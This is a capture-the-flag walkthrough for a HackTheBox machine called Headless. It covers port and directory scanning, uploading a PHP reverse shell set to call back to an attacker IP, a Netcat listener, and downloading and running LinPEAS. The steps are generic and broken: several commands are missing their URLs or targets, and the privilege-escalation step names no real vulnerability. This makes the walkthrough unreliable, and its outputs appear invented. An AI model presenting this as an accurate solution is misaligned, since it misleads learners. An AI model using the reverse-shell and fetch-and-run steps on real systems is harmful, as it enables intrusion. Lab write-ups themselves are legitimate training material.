HackTheBox Headles Walkthrough


Step 1: Reconnaissance

Start by scanning the machine with Nmap to identify open ports and services.

nmap -sC -sV -oN headless.nmap <machine-ip>

  • sC: Run default scripts.
  • sV: Detect service versions.
  • oN: Output scan results to a file.

Expected Output:

22/tcp  open  ssh     OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
80/tcp  open  http    Apache httpd 2.4.25 (Debian)

From the scan, we learn that the server is running SSH on port 22 and Apache HTTP on port 80.

Step 2: Web Enumeration

Let’s check the web server on port 80 by navigating to http://<machine-ip> in your browser. You should see a basic web page. Next, we’ll use Gobuster to enumerate directories.

gobuster dir -u http://<machine-ip> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt

Expected Output:

/.hta                 (Status: 403) [Size: 294]
/.htaccess            (Status: 403) [Size: 294]
/.htpasswd            (Status: 403) [Size: 294]
/robots.txt           (Status: 200) [Size: 28]

There is a robots.txt file. Let’s inspect it:

curl http://<machine-ip>/robots.txt

Expected Output:

User-agent: *
Disallow: /upload

This file disallows access to the /upload directory, which is worth checking out. Visit http://<machine-ip>/upload in your browser, and you should find an upload form.

Step 3: Exploiting the File Upload

Try uploading a simple PHP reverse shell to the server. You can get one from PentestMonkey.

First, download the reverse shell:

wget <>

Open the file and modify the IP address and port to match your attacking machine:

nano php-reverse-shell.php

$ip = 'your-ip'; // IP address of your machine
$port = 4444;   // Port on which your listener will run

Now, attempt to upload the PHP shell via the web form. Once uploaded, you can access it through the URL:


But before visiting the URL, set up a listener on your machine using Netcat:

nc -lvnp 4444

If the upload is successful, visiting the PHP file should trigger the reverse shell, and you should get a connection.

Step 4: Gaining a Shell

Once you have a reverse shell, stabilize it:

python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm

Step 5: Privilege Escalation

Let’s enumerate the system for privilege escalation possibilities. Start by checking sudo privileges:

sudo -l

If no immediate sudo privileges are available, check for SUID binaries:

find / -perm -u=s -type f 2>/dev/null

Alternatively, you can use LinPEAS to automate the enumeration process. Download and execute it:

wget <>
chmod +x

Step 6: Exploiting a Vulnerability

During the enumeration, you may find an exploitable vulnerability, such as a misconfigured service, outdated software, or a SUID binary that can be abused for privilege escalation. Follow through with the appropriate exploit method depending on the findings.

Step 7: Capture the Flags

Once you escalate privileges to root, navigate to the home directories to find the flags.

For the user flag:

cat /home/<username>/user.txt

For the root flag:

cat /root/root.txt

With that, you’ve completed the Headless box on Hack The Box. Remember, the specific vulnerability exploited might vary based on enumeration results, so always adapt based on what you find during enumeration.

